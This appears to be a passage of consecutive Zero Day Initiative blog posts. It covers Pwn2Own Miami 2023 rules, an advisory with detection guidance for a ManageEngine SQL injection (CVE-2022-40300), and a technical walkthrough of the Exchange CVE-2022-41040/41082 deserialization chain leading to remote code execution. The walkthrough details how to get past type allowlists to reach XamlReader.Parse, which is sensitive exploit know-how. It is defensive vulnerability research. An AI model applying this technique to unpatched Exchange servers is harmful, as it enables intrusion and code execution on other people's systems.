The Credential Theft target should prove interesting. For this scenario, the contestant must create a session with a trusted certificate but use credentials acquired by either decrypting a password from an ongoing session or by abusing a vulnerability that allows for the retrieval of the stored password from the server. The server will be configured with an ‘admin’ account with a random password that is 12-16 characters long. A successful entry must log in using a legitimate client after the password is retrieved by some means. Brute force attacks won’t be allowed.

For the “bypass trusted application check” scenario, the contestant must bypass the trusted application check that occurs after the creation of a secure channel. Entries that bypass the check by manipulating the server security configuration are out of scope. There are additional requirements for this target, so definitely read the rules carefully if you want to enter.

Here is the full list of targets for the OPC UA Server category:

OPC UA Client Category

Similar to the Server category, we’ll have specific OPC UA Clients available to target. Again, the “bypass trusted application check” scenario must meet specific criteria, so you should check out the rules for a full description.

Here is the full list of targets for the OPC UA Client category:

Data Gateway Category

This category focuses on devices that connect other devices of varying protocols. There are two products in this category. The first is the Triangle Microworks SCADA Data Gateway product. Triangle Microworks makes the most widely used DNP3 protocol stack.  The other is the Softing Secure Integration Server. According to their website, “Secure Integration Server covers the full range of OPC UA security features and enables the implementation of state-of-the-art security solutions.” We’ll see if that holds true throughout the contest.

A successful entry in this category must result in arbitrary code execution.

Edge Category

This category is new for 2023 and reflects how edge devices are often used in ICS/SCADA networks to manage and maintain systems. For this year’s event, we’ll have the AVEVA Edge Data Store as our sole target in this category. Edge Data Store collects, stores, and provides data from remote and uncrewed assets. This is an exciting addition to the contest, and we look forward to seeing what exploits researchers demonstrate against this target.

A successful entry in this category must result in arbitrary code execution.

Master of Pwn

No Pwn2Own contest would be complete without crowning a Master of Pwn, and Pwn2Own Miami is no exception. Earning the title comes with a slick trophy and 65,000 ZDI reward points (instant Platinum status in 2024, which includes a one-time bonus estimated at $25,000).

For those not familiar with how it works, Master of Pwn points are accumulated for each successful attempt. While only the first demonstration in a category wins the full cash award, each successful entry claims the full number of Master of Pwn points. Since the order of attempts is determined by a random draw, those who receive later slots can still claim the Master of Pwn title – even if they earn a lower cash payout.

To add to the excitement, there are penalties for withdrawing from an attempt once you register for it. If a contestant decides to withdraw from the registered attempt before the actual attempt, the Master of Pwn points for that attempt will be divided by 2 and deducted from the contestant's point total for the contest. Since Pwn2Own is now often a team competition, along with the initial deduction of points, the same number of Master of Pwn points will also be deducted from all contestant teams from the same company.

The Complete Details

The full set of rules for Pwn2Own Miami 2023 can be found here. They may be changed at any time without notice. Anyone thinking about participating should read the rules thoroughly and completely. Registration is required to ensure we have sufficient resources on hand at the event. Please contact ZDI at zdi@trendmicro.com to begin the registration process. (Email only, please; queries via Twitter, blog post, or other means will not be acknowledged or answered.) If we receive more than one registration for any category, we’ll hold a random drawing to determine the order of attempts. Contest registration closes at 5:00 p.m. Eastern Standard Time on February 9, 2023.

The Results

We’ll be live blogging results throughout the competition.
Be sure to keep an eye on the blog for the latest results. We’ll also be posting results and videos to Twitter, YouTube, Mastodon, LinkedIn, and Instagram, so follow us on your favorite flavor of social media for the latest news from the event. We look forward to seeing everyone again in Miami, and we look forward to seeing what new exploits and attack techniques they bring with them.

©2022 Trend Micro Incorporated. All rights reserved. PWN2OWN, ZERO DAY INITIATIVE, ZDI, and Trend Micro are trademarks or registered trademarks of Trend Micro Incorporated. All other trademarks and trade names are the property of their respective owners.

##### CVE-2022-40300: SQL Injection in ManageEngine Privileged Access Management

In this excerpt of a Trend Micro Vulnerability Research Service vulnerability report, Justin Hung and Dusan Stevanovic of the Trend Micro Research Team detail a recently patched SQL injection vulnerability in Zoho ManageEngine products. The bug is due to improper validation of resource types in the AutoLogonHelperUtil class. Successful exploitation of this vulnerability could lead to arbitrary SQL code execution in the security context of the database service, which runs with SYSTEM privileges. The following is a portion of their write-up covering CVE-2022-40300, with a few minimal modifications.

ManageEngine recently patched a SQL injection vulnerability in their Password Manager Pro, PAM360, and Access Manager Plus products. The vulnerability is due to improper validation of resource types in the AutoLogonHelperUtil class. A remote attacker can exploit the vulnerability by sending a crafted request to the target server. Successful exploitation could lead to arbitrary SQL code execution in the security context of the database service, which runs with SYSTEM privileges.

The Vulnerability

Password Manager Pro is a secure vault for storing and managing shared sensitive information such as passwords, documents, and digital identities of enterprises.
The vulnerable component is also included in two other similar ManageEngine products: PAM360 and Access Manager Plus. A user can access the web console on these products through HTTPS requests via the following ports:

The HTTP request body may contain data of various types. The data type is indicated in the Content-Type header field. One of the standardized types is multipart, which contains various subtypes that share a common syntax. The most widely used subtype of the multipart type is multipart/form-data. A multipart/form-data body is made up of multiple parts, each of which contains a Content-Disposition header. Each part is separated by a string of characters. The string of characters separating the parts is defined by the boundary keyword found in the Content-Type header line. The Content-Disposition header contains parameters in “name=value” format. Additional header lines may be present in each part; each header line is separated by a CRLF sequence. The last header line is terminated by two consecutive CRLF sequences, and the form element’s data follows. The filename parameter in a Content-Disposition header provides a suggested file name to be used if the element's data is detached and stored in a separate file.

A user with admin privileges can add or edit a resource type via the Password Manager Pro web interface by clicking the menu “Resources” -> “Resource Types” -> “Add” (or “Edit”), and an HTTP multipart/form-data request will be submitted to the “AddResourceType.ve” endpoint, as in the example shown below:

where several form-data parts are transferred in the request, like “TYPEID”, “dnsname_label”, “resLabChkName__1”, etc. The data carried in the multipart/form-data part with a name parameter value of “resourceType” represents the name of the resource type, which is relevant to the vulnerability in this report.

An SQL injection vulnerability exists in Password Manager Pro.
The vulnerability is due to a lack of sanitization of the name of the resource type in the Java class AutoLogonHelperUtil. The AutoLogonHelperUtil class is used by several controller classes, like AutologonController and PasswordViewController, to construct a partial SQL statement related to the query for existing resource types.

For example, if a user clicks the menu “Connections” on the web admin interface, a request will be sent to the “AutoLogonPasswords.ec” endpoint, and the includeView() method of the ViewProcessorServlet class is called. The includeView() method will use the AutologonController class to handle the request. The AutologonController class is derived from the SqlViewController class, and its updateViewModel() method is called to process the request. The updateViewModel() method will first call the initializeSQL() method to get an SQL statement. It then calls the getAsTableModel() method of the SQLQueryAPI class to execute the SQL statement.

In the initializeSQL() method, it will call the getSQLString() method of the AutologonController class to get the SQL statement, which will invoke the getFilledString() method of the TemplateAPI class. In the getFilledString() method, it will call the getVariableValue() method of the AutologonController. The getVariableValue() method will use the getOSTypeCriteriaForView() method of the AutoLogonHelperUtil class to construct a partial SQL statement. The getOSTypeCriteriaForView() will call the getOSTypeCriteria() method, which uses getOSTypeList() to read all resource types from the database. It then uses these resource types to build a partial SQL statement as below:

PTRX_OSTYPE in (<name_1>, <name_2>, ..., <name_n>)

where each <name_i> represents a resource type name queried from the database by the getOSTypeList() method. Then, this partial SQL statement will be returned to getOSTypeCriteriaForView() and then be returned to getFilledString().
The getFilledString() will use this partial SQL statement to generate the final complete SQL statement and return it back to getSQLString(). However, the getOSTypeCriteria() method of the AutoLogonHelperUtil class does not sanitize the name of the resource type (returned from getOSTypeList()) for SQL injection characters before using it to create a partial SQL statement.

An attacker can therefore first add a new resource type (or edit an existing resource type) with a crafted resource type name containing a malicious SQL command, and then click a menu such as “Connections” to invoke the methods of the AutoLogonHelperUtil class, which will use the malicious resource type name to construct a SQL statement. This could trigger the execution of the injected SQL command. A remote authenticated attacker can exploit the vulnerability by sending a crafted request to the target server. Successful exploitation could lead to arbitrary SQL code execution in the security context of the database service, which runs with SYSTEM privileges.

Detection Guidance

To detect an attack exploiting this vulnerability, the detection device must monitor and parse traffic on the ports listed above. Note that the traffic is encrypted via HTTPS and should be decrypted before performing the following steps.

The detection device must inspect HTTP POST requests to a Request-URI containing the following string:

/AddResourceType.ve

If found, the detection device must inspect each of the multipart/form-data parts in the body of the request. In each part, the detection device must search for the Content-Disposition header and its name parameter to see if its value is “resourceType”. If found, the detection device must continue to inspect the data carried in this multipart/form-data part to see if it contains the single-quote character “' (\x27)”. If found, the traffic should be considered malicious and an attack exploiting this vulnerability is likely underway.
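As a rough illustration, the matching logic above can be sketched in Python. The function name and input shapes here are hypothetical (a real detection device operates on decrypted HTTPS traffic streams), but the matching rules follow the guidance:

```python
import re

def is_suspicious_add_resource_type(request_line, headers, body):
    """Sketch of the detection steps: flag POSTs to /AddResourceType.ve whose
    'resourceType' multipart field contains a single-quote (\\x27)."""
    # Method and Request-URI matching is case-sensitive per the guidance.
    method, uri = request_line.split(" ")[:2]
    if method != "POST" or "/AddResourceType.ve" not in uri:
        return False
    # Header-name matching is case-insensitive.
    content_type = next((v for k, v in headers.items()
                         if k.lower() == "content-type"), "")
    m = re.search(r'boundary="?([^";]+)"?', content_type)
    if not m:
        return False
    for part in body.split(b"--" + m.group(1).encode()):
        head, _, data = part.partition(b"\r\n\r\n")
        # Locate the part whose Content-Disposition name is "resourceType".
        if re.search(rb'content-disposition:.*name="resourceType"',
                     head, re.IGNORECASE):
            if b"'" in data:  # the \x27 character in the field value
                return True
    return False
```

Note that, as the guidance's additional notes point out, the Request-URI would also need URL decoding before matching, which this sketch omits.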
An example of malicious requests is shown below:

Additional notes:

• The string matching for the Request-URI and “POST” should be performed in a case-sensitive manner, while other string matching like “name”, “resourceType” and “Content-Disposition” should be performed in a case-insensitive manner.
• The Request-URI may be URL encoded and should be decoded before applying the detection guidance.
• It is possible that the single quote “' (\x27)” is naturally found in the resource type name, resulting in false positives. However, in normal cases, the possibility should be low.

Conclusion

ManageEngine patched this and other SQL injections in September. Interestingly, the patch for PAM360 came a day after the patches for Password Manager Pro and Access Manager Plus. The vendor offers no other workarounds. Applying these updates is the only way to fully protect yourself from these bugs.

Special thanks to Justin Hung and Dusan Stevanovic of the Trend Micro Research Team for providing such a thorough analysis of this vulnerability. For an overview of Trend Micro Research services please visit http://go.trendmicro.com/tis/. The threat research team will be back with other great vulnerability analysis reports in the future. Until then, follow the team on Twitter, Mastodon, LinkedIn, or Instagram for the latest in exploit techniques and security patches.

##### Control Your Types or Get Pwned: Remote Code Execution in Exchange PowerShell Backend

By now you have likely already heard about the in-the-wild exploitation of Exchange Server, chaining CVE-2022-41040 and CVE-2022-41082. It was originally submitted to the ZDI program by the researcher known as “DA-0x43-Dx4-DA-Hx2-Tx2-TP-S-Q from GTSC”. After successful validation, it was immediately submitted to Microsoft. They patched both bugs along with several other Exchange vulnerabilities in the November Patch Tuesday release. It is a beautiful chain, with an ingenious vector for gaining remote code execution.
The tricky part is that it can be exploited in multiple ways, making both mitigation and detection harder. This blog post is divided into two main parts:

·       Part 1 – where we review details of the good old ProxyShell Path Confusion vulnerability (CVE-2021-34473), and we show that it can still be abused by a low-privileged user.
·       Part 2 – where we present the novel RCE vector in the Exchange PowerShell backend.

Here’s a quick demonstration of the bugs in action:

Part 1: The ProxyShell Path Confusion for Every User (CVE-2022-41040)

There is a great chance that you are already familiar with the original ProxyShell Path Confusion vulnerability (CVE-2021-34473), which allowed Orange Tsai to access the Exchange PowerShell backend during Pwn2Own Vancouver 2021. If you are not, I encourage you to read the details in this blog post. Microsoft patched this vulnerability in July of 2021. However, it turned out that the patch did not address the root cause of the vulnerability. Post-patch, unauthenticated attackers are no longer able to exploit it due to the implemented access restrictions, but the root cause remains.

First, let’s see what happens if we try to exploit it without authentication.

HTTP Request

HTTP Response

As expected, a 401 Unauthorized error was returned. However, can you spot something interesting in the response? The server says that we can try to authenticate with either Basic or NTLM authentication. Let’s give it a shot.

HTTP Request

HTTP Response

Exchange says that it is cool now! This shows us that:

·       The ProxyShell Path Confusion still exists, as we can reach the PowerShell backend through the autodiscover endpoints.
·       As the autodiscover endpoints allow the use of legacy authentication (NTLM and Basic authentication) by default, we can access those endpoints by providing valid credentials.

After successful authentication, our request will be redirected to the selected backend service. Legacy authentication in Exchange is described by Microsoft here.
The following screenshot presents a fragment of the table included in the previously mentioned webpage.

According to the documentation and some manual testing, it seems that an Exchange instance was protected against this vulnerability if:

·       A custom protection mechanism was deployed that blocks the Autodiscover SSRF vector (for example, on the basis of the URL), or
·       Legacy authentication was blocked for the Autodiscover service. This can be done with a single command (though an Exchange Server restart is probably required):

Set-AuthenticationPolicy -BlockLegacyAuthAutodiscover:$true

So far, we have discovered that an authenticated user can access the Exchange PowerShell backend. We will now proceed to the second part of this blog post to discuss how this can be exploited for remote code execution.

Part 2: PowerShell Remoting Objects Conversions – Be Careful or Be Pwned (CVE-2022-41082)

In this part, we will focus on the remote code execution vulnerability in the Exchange PowerShell backend. It is a particularly interesting vulnerability, and is based on two aspects:

·       PowerShell Remoting conversions and instantiations.
·       Exchange custom converters.

It has been a very long ride for me to understand this vulnerability fully, and I find that I am still learning more about PowerShell Remoting. The PowerShell Remoting Protocol has a very extensive specification, and there are some hidden treasures in there. You may want to look at the official documentation, although I will try to guide you through the most important aspects. The discussion here should be enough to understand the vulnerability.

PowerShell Remoting Conversions Basics and Exchange Converters

There are several ways in which serialized objects can be passed to a PowerShell Remoting instance. We can divide those objects into two main categories:

·       Primitive type objects
·       Complex objects

Primitive types are not always what you would think of as “primitive”. We have some basic types here such as strings and byte arrays, but “primitive types” also include types such as URI, XMLDocument and ScriptBlock (the last of which is blocked by default in Exchange). Primitive type objects can usually be specified with a single XML tag, for example:
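For instance, primitive types are each carried in a single element. The element names below follow the MS-PSRP serialization format; the concrete values are made up for illustration:

```xml
<!-- a primitive string -->
<S>Get-Mailbox</S>
<!-- an XMLDocument, also counted among the "primitive" types -->
<XD>&lt;doc&gt;&lt;entry&gt;1&lt;/entry&gt;&lt;/doc&gt;</XD>
<!-- a URI -->
<URI>http://example.org/</URI>
```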

Complex objects have a completely different representation. Let’s take a quick look at the example from the documentation:
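The original post showed this example as an image; reconstructed from the MS-PSRP documentation (coordinate values here are illustrative), the serialized System.Drawing.Point looks roughly like this:

```xml
<Obj RefId="0">
  <TN RefId="0">
    <T>System.Drawing.Point</T>
    <T>System.ValueType</T>
    <T>System.Object</T>
  </TN>
  <Props>
    <I32 N="X">10</I32>
    <I32 N="Y">20</I32>
  </Props>
</Obj>
```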

First, we can see that the object is specified with the “Obj” tag. Then, we use the “TN” and “T” tags to specify the object type. Here, we have the System.Drawing.Point type, which inherits from System.ValueType.

An object can be constructed in multiple ways. Shown here is probably the simplest case: direct specification of properties. The “Props” tag defines the properties of the object. You can verify this by comparing the presented serialized object and the class documentation.

One may ask: How does PowerShell Remoting deserialize objects? Sadly, there is no single, easy answer here. PowerShell Remoting implements multiple object deserialization (or conversion) mechanisms, including quite complex logic as well as some validation. I will focus on two main aspects, which are crucial for our vulnerability.

a)     Verifying if the specified type can be deserialized
b)     Converting (deserializing) the object

Which Types Can Be Deserialized?

PowerShell Remoting will not deserialize all .NET types. By default, it allows those types related to the remoting protocol itself. However, the list of allowed types can be extended. Exchange does that through two files:

·       Exchange.types.ps1xml
·       Exchange.partial.types.ps1xml

An example entry included in those files will be presented soon.

In general, the type specified in the payload that can be deserialized is referenced as the “Target Type For Deserialization”. Let’s move to the second part.

How Is Conversion Performed?

In general, conversion is done in the following way.

·       Retrieve properties/member sets, deserializing complex values if necessary.
·       Verify that this type is allowed to be deserialized.
·       If yes, perform the conversion.

Now the most important part. PowerShell Remoting implements multiple conversion routines. In order to decide which converter should be used, the System.Management.Automation.LanguagePrimitives.FigureConversion(Type, Type) method is used. It accepts two input arguments:

·       Type fromType – the type from which the object will be obtained (for example, string or byte array).
·       Type toType – the target type for deserialization.

The FigureConversion method contains logic to find a proper converter. If it is not able to find any converter, it will throw an exception.

As already mentioned, multiple converters are available. However, the most interesting for us are:

·       ConvertViaParseMethod – invokes Parse(String) method on the target type. In this case, we control the string argument.
·       ConvertViaConstructor – invokes the single-argument constructor that accepts an argument of type fromType. In this case, we can control the argument, but limitations apply.
·       ConvertViaCast – invokes the proper cast operator, which could be an implicit or explicit cast.
·       ConvertViaNoArgumentConstructor – invokes the no-argument constructor and sets the public properties using reflection.
·       CustomConverter – there are also some custom converters specified.

As we can see, these conversions are very powerful and provide a strong reflection primitive. In fact, some of them were already mentioned in the well-known Friday the 13th JSON Attacks Black Hat paper. As we have mentioned, though, the toType is validated and we are not able to use these converters to instantiate objects of arbitrary type. That would certainly be a major security hole.
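The selection logic for the first two converters can be sketched in Python. This is a conceptual stand-in, not the actual FigureConversion implementation; the names figure_conversion, Port, and parse are illustrative, and the real logic in System.Management.Automation is considerably more involved.

```python
# Sketch of converter selection: prefer a Parse(String)-style method when the
# source value is a string, otherwise fall back to a single-argument
# constructor that accepts the source value (hypothetical, simplified logic).
def figure_conversion(from_value, to_type):
    parse = getattr(to_type, "parse", None)
    if isinstance(from_value, str) and callable(parse):
        return lambda: parse(from_value)   # analog of ConvertViaParseMethod
    return lambda: to_type(from_value)     # analog of ConvertViaConstructor

class Port:
    """Toy target type with both a constructor and a parse() hook."""
    def __init__(self, number: int):
        self.number = number

    @staticmethod
    def parse(text: str) -> "Port":
        return Port(int(text))

converter = figure_conversion("8080", Port)
print(converter().number)  # -> 8080, via the parse() route
```

The key point the sketch preserves: the caller controls both the source value and which target type's conversion machinery gets invoked.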

SerializationTypeConverter – Exchange Custom Converter

Let’s have a look at one particular item specified in the Exchange.types.ps1xml file:

There are several basic things that we can learn from this XML fragment:

·       Microsoft.Exchange.Data.IPvxAddress class is included in the list of the allowed target types.
·       The TargetTypeForDeserialization member gives the full class name.
·       A custom type converter is defined: Microsoft.Exchange.Data.SerializationTypeConverter
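Based on the points above, such an entry can be sketched roughly as follows. The element names approximate the ps1xml format; this is not a verbatim copy of Exchange.types.ps1xml.

```python
import xml.etree.ElementTree as ET

# Approximate reconstruction of a ps1xml entry (element names and layout are
# a sketch of the format, not the exact Exchange file contents).
PS1XML_ENTRY = """
<Type>
  <Name>Microsoft.Exchange.Data.IPvxAddress</Name>
  <Members>
    <MemberSet>
      <Name>PSStandardMembers</Name>
      <Members>
        <NoteProperty>
          <Name>TargetTypeForDeserialization</Name>
          <Value>Microsoft.Exchange.Data.IPvxAddress</Value>
        </NoteProperty>
      </Members>
    </MemberSet>
  </Members>
  <TypeConverter>
    <TypeName>Microsoft.Exchange.Data.SerializationTypeConverter</TypeName>
  </TypeConverter>
</Type>
"""

root = ET.fromstring(PS1XML_ENTRY)
allowed_type = root.findtext("Name")                 # the allowlisted type
converter = root.findtext("TypeConverter/TypeName")  # the custom converter
target = root.findtext(".//NoteProperty/Value")      # TargetTypeForDeserialization
print(allowed_type, converter, target)
```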

The SerializationTypeConverter wraps the BinaryFormatter serializer with ExchangeBinaryFormatterFactory. That way, the BinaryFormatter instance created will make use of the allow and block lists.

To sum up, some of our types (or members) can be retrieved through BinaryFormatter deserialization. Those types must be included in the SerializationTypeConverter allowlist, though. Moreover, custom converters are last-resort converters. Before they are used, PowerShell Remoting will try to retrieve the object through a constructor or a Parse method.
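The effect of such a factory can be illustrated with a Python analogy, not the actual .NET code: pickle's Unpickler.find_class plays the role of the serialization binder, refusing to resolve any class that is not explicitly allowlisted. The allowlist contents here are arbitrary.

```python
import io
import pickle

# Analogy for ExchangeBinaryFormatterFactory: a deserializer that only
# resolves classes on an explicit allowlist.
ALLOWED = {("builtins", "complex")}

class AllowlistUnpickler(pickle.Unpickler):
    def find_class(self, module, name):
        if (module, name) not in ALLOWED:
            raise pickle.UnpicklingError(f"{module}.{name} is not allowlisted")
        return super().find_class(module, name)

def restricted_loads(data: bytes):
    """Deserialize, but only allowlisted classes may be instantiated."""
    return AllowlistUnpickler(io.BytesIO(data)).load()

print(restricted_loads(pickle.dumps(complex(1, 2))))  # allowed type: succeeds
# restricted_loads(pickle.dumps(range(3)))            # blocked: UnpicklingError
```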

It is high time to show you the RCE payload and see what happens during the conversion.

This XML fragment presents the specification of the “-Identity” argument of the “Get-Mailbox” Exchange PowerShell cmdlet. We have divided the payload into three sections: Object type, Properties, and Payload.

·       Object type section – specifies that there will be an object of type System.ServiceProcess.ServiceController.
·       Properties section – specifies the properties of the object. One thing that should catch your attention here is the property with the name TargetTypeForDeserialization. You should also notice the byte array with the name SerializationData. (Note that PowerShell Remoting accepts an array of bytes in the form of a base64 encoded string).
·       Payload section – contains XML in the form of a string. The XML is a XAML deserialization gadget based on ObjectDataProvider.
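A schematic skeleton of that three-section structure can be sketched using the PowerShell Remoting serialization tag names (Obj, TN, Props, MS, S, BA). The base64 blob, the XAML gadget string, and the attribute values are placeholders; this is not the actual exploit payload.

```python
import xml.etree.ElementTree as ET

# Schematic three-section payload skeleton with placeholder values.
PAYLOAD_SKELETON = """
<Obj RefId="0">
  <TN RefId="0"><T>System.ServiceProcess.ServiceController</T></TN>
  <Props>
    <S N="Name">Type</S>
    <Obj N="TargetTypeForDeserialization" RefId="1">
      <TN RefId="1"><T>System.Exception</T></TN>
      <MS><BA N="SerializationData">BASE64-PLACEHOLDER</BA></MS>
    </Obj>
  </Props>
  <S>XAML-GADGET-PLACEHOLDER</S>
</Obj>
"""

root = ET.fromstring(PAYLOAD_SKELETON)
print(root.findtext("TN/T"))            # object type section
print(root.findtext("Props/Obj/TN/T"))  # nested type inside the properties section
```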

Getting Control over TargetTypeForDeserialization

In the first step, we are going to focus on the Properties section of the RCE payload. Before we do that, let’s quickly look at some fragments of the deserialization code. The majority of the deserialization routines are implemented in the System.Management.Automation.InternalDeserializer class.

Let’s begin with this fragment of the ReadOneObject(out string) method:

At [1], it invokes the ReadOneDeserializedObject method, which may return an object.

At [2], the code flow continues, provided an object has been returned. We will focus on this part later.

Let’s quickly look at the ReadOneDeserializedObject method. It goes through the XML tags and executes appropriate actions, depending on the tag. However, only one line is particularly interesting for us.

At [1], it calls ReadPSObject. This happens when the tag name is equal to “Obj”.

Finally, we analyze a fragment of the ReadPSObject function.

At [1], the code retrieves the type names (strings) from the tag.

At [2], the code retrieves the properties from the tag.

At [3], the code retrieves the member set from the tag.

At [4], the code tries to read a primitive type (such as string or byte array).

At [5], the code initializes a new deserialization procedure, provided that the tag is an “Obj” tag.

So far, we have seen how InternalDeserializer parses the PowerShell Remoting XML. As shown earlier, the Properties section of the payload contains a Props tag. It seems that we must look at the ReadProperties method.

At [1], the adaptedMembers property of the PSObject object is set to some PowerShell-related collection.

At [2], the property name is obtained (from the N attribute).

At [3], the code again invokes ReadOneObject in order to deserialize the nested object.

At [4], it instantiates a PSProperty object, based on the deserialized value and the property name.

Finally, at [5], it extends adaptedMembers by adding the new PSProperty. This is a crucial step, so pay close attention to it.
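The ReadProperties flow can be condensed into a small Python sketch, with a dictionary standing in for the adaptedMembers collection and plain strings standing in for nested deserialized objects. Names and structure are illustrative, not the actual InternalDeserializer code.

```python
import xml.etree.ElementTree as ET

def read_properties(props_elem):
    """Simplified stand-in for ReadProperties."""
    adapted_members = {}                    # [1] the adaptedMembers collection
    for child in props_elem:
        name = child.get("N")               # [2] property name from the N attribute
        value = child.text                  # [3] stands in for nested ReadOneObject
        adapted_members[name] = value       # [4]/[5] wrap and append the property
    return adapted_members

props = ET.fromstring(
    '<Props><S N="Name">Type</S>'
    '<S N="TargetTypeForDeserialization">System.Windows.Markup.XamlReader</S>'
    '</Props>')
print(read_properties(props))
```

In the real payload, TargetTypeForDeserialization is a nested Obj rather than a plain string; the sketch flattens that for brevity.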

We have two properties defined here:

·       The Name property, which is of type string and whose value is the string “Type”.

·       The TargetTypeForDeserialization property, whose value is a complex object specified as follows:

o   The type (TN tag) is System.Exception.
o   There is a value stored as a base64 encoded string, representing a byte array.

We have already seen that nested objects (defined with the Obj tag) are also deserialized with the ReadOneObject method. We have already looked at its first part (object retrieval). Now, let’s see what happens further:

At [1], the code retrieves the Type targetTypeForDeserialization through the GetTargetTypeForDeserialization method.

At [2], the code tries to retrieve a new object through the LanguagePrimitives.ConvertTo method (if GetTargetTypeForDeserialization returned anything). The targetTypeForDeserialization is one of the inputs. Another input is the object obtained with the already analyzed ReadOneDeserializedObject method.

As we have specified the object of the System.Exception type (TN tag), the GetTargetTypeForDeserialization method will return the System.Exception type. Why does the exploit use Exception? For two reasons:

·       It is included in the allowlist Exchange.partial.types.ps1xml.
·       It has a custom converter registered: Microsoft.Exchange.Data.SerializationTypeConverter.

These two conditions are important because they allow the object to be retrieved using the SerializationTypeConverter, which was discussed above as a wrapper for BinaryFormatter. Note that there are also various other types available besides System.Exception that meet the two conditions mentioned here, and those types could be used as an alternative to System.Exception.

Have you ever tried to serialize an object of type Type? If yes, you probably know that it is serialized as an instance of System.UnitySerializationHolder. If you base64-decode the string provided in the Properties part of our payload, you will quickly realize that it is a System.UnitySerializationHolder with the following properties:

·       m_unityType = 0x04,
·       m_data = "System.Windows.Markup.XamlReader",
·       m_assemblyName = "PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35"

To sum up, our byte array holds the object, which constructs a XamlReader type upon deserialization! That is why we want to use the SerializationTypeConverter – it allows us to retrieve an object of type Type. An immediate difficulty is apparent here, though, because Exchange’s BinaryFormatter is limited to types on the allowlist. Hence, it’s not clear why the deserialization of this byte array should succeed. Amazingly, though, System.UnitySerializationHolder is included in the SerializationTypeConverter’s list of allowed types!
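Python has a close analogy that makes this behavior easy to see: pickling a class serializes it by reference, and unpickling hands back the class object itself, just as deserializing a System.UnitySerializationHolder yields an instance of Type in .NET.

```python
import pickle

# Serialize the *class*, not an instance: the stream stores only a reference
# to builtins.complex, and unpickling resolves it back to the type object.
data = pickle.dumps(complex)
restored = pickle.loads(data)
print(restored is complex)  # -> True: we got the type object itself back
```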

Let’s see how it looks in the debugger:

Even though the targetTypeForDeserialization is Exception, LanguagePrimitives.ConvertTo returned the Type object for XamlReader (see variable obj2). This happens because the final type of the retrieved object is not verified. Finally, this Type object will be added to the adaptedMembers collection (see the ReadProperties method).

Getting Code Execution Through XamlReader, or Any Other Class

We have already deserialized the TargetTypeForDeserialization property, which is a Type object for the XamlReader type. Perfect! As you might expect, allowing users to obtain an arbitrary Type object through deserialization is not the best idea. But we still need to understand: why does PowerShell Remoting respect such a user-defined property? To begin answering this, let’s consider what the code should do next:

·       It should deserialize the S tag defined after the Props tag (the payload section of the input XML). This is a primitive string type, thus it retrieves the string.
·       It should take the type of the main object, which is defined in the TN tag (here: System.ServiceProcess.ServiceController).
·       It should try to create the System.ServiceProcess.ServiceController instance from the provided string.

Our goal is to switch types here. We want to perform a conversion so that the System.Windows.Markup.XamlReader type is retrieved from the string. Let’s analyze the GetTargetTypeForDeserialization function to see how this can be achieved.

At [1], it tries to retrieve an object of the PSMemberInfo type using the GetPSStandardMember method. It passes two parameters: backupTypeTable (this contains the PowerShell Remoting allowed types/converters) and the hardcoded string “TargetTypeForDeserialization”.

At [2], the code retrieves the Value member from the obtained object and tries to cast it to Type. When successful, the Type object will be returned. If not, null will be returned.

The GetPSStandardMember method is not easy to understand, especially when you are not familiar with the classes and methods used here. However, I will try to summarize it for you in two points:

At [1], the PSMemberSet object is retrieved through the TypeTableGetMemberDelegate method. It takes our specified type (here, System.ServiceProcess.ServiceController) and compares it against the list of allowed types. If the provided type is allowed, it will extract its properties and create the new member set.

The following screenshot presents the PSMemberSet retrieved for the System.ServiceProcess.ServiceController type:

At [2], the collection of members is created from multiple sources. If a member is not included in the basic member set (obtained from the list of allowed types), it will try to find such a member in a different source. This collection includes the adapted members, which contain the deserialized properties obtained through the Props tag.

Finally, it will try to retrieve the TargetTypeForDeserialization member from the final collection.

Let’s have a quick look at the specification of System.ServiceProcess.ServiceController in the list of allowed types. It is defined in the default PowerShell Remoting types list, located in C:\Windows\System32\WindowsPowerShell\v1.0\types.ps1xml.

As you can see, this type does not have the TargetTypeForDeserialization member specified. Only the DefaultDisplayPropertySet member is defined. Accordingly, the targetTypeForDeserialization will be retrieved from adaptedMembers. As the Exchange SerializationTypeConverter allows us to retrieve a Type through deserialization, we can provide a new conversion type through adaptedMembers!
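This lookup order, the crux of the bug, can be sketched as follows. All names are hypothetical stand-ins: a trusted type-table entry is consulted first, and only on a miss does the lookup fall back to the sender-controlled adaptedMembers.

```python
# Simplified model of the member lookup described above (illustrative only).
TYPE_TABLE = {
    "System.ServiceProcess.ServiceController": {
        "DefaultDisplayPropertySet": ["Status", "Name", "DisplayName"],
        # Note: no TargetTypeForDeserialization entry exists for this type.
    },
}

def get_ps_standard_member(type_name, adapted_members, member):
    table_members = TYPE_TABLE.get(type_name, {})
    if member in table_members:            # [1] trusted type table wins if present
        return table_members[member]
    return adapted_members.get(member)     # [2] fallback: attacker-controlled data

adapted = {"TargetTypeForDeserialization": "System.Windows.Markup.XamlReader"}
print(get_ps_standard_member("System.ServiceProcess.ServiceController",
                             adapted, "TargetTypeForDeserialization"))
# The attacker-supplied type wins, because the type table has no such member.
```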

The following screenshot presents the obtained PSMemberInfo, which defines the XamlReader type:

Success! GetTargetTypeForDeserialization returned the XamlReader type. You probably remember that PowerShell Remoting contains several converters. One of them allows calling the Parse(String) method. Accordingly, we can call the XamlReader.Parse(String) method, where the input will be equal to the string provided in the S tag. Let’s quickly verify it with the debugger.

The following screenshot presents the debugging of the LanguagePrimitives.ConvertTo method. The resultType is indeed equal to the XamlReader:

The next screenshot presents the valueToConvert argument. It includes the string (XAML gadget) included in our payload:

We will soon reach the LanguagePrimitives.FigureParseConversion method. The following screenshot illustrates debugging this method. One can see that:

·       fromType is equal to String.
·       toType is equal to XamlReader.
·       methodInfo contains the XamlReader.Parse(String string) method.

Yes! We have been able to get the XamlReader.Parse(String string) method through reflection! We also fully control the input that will be passed to this function. Finally, it will be invoked through the System.Management.Automation.LanguagePrimitives.ConvertViaParseMethod.ConvertWithoutCulture method, as presented in the following screenshot:

As you may be aware, XamlReader allows us to achieve code execution through loading XAML (see ysoserial.net). When we continue the process, our command gets executed.

There are also plenty of other classes besides XamlReader that could be abused in a similar way. For example, you can call the single-argument constructor of any type, so you can be creative here!

TL;DR – Summary

Getting to understand this vulnerability has been a long and complicated process. I hope that I have provided enough details for you to understand this issue. I would like to summarize the whole Microsoft Exchange chain in several points:

·       The path confusion in the Autodiscover service (CVE-2021-34473) was not fixed, but rather restricted to authenticated users. Authenticated users can still easily abuse it using Basic or NTLM authentication.

·       PowerShell Remoting allows us to perform object deserialization/conversion operations.

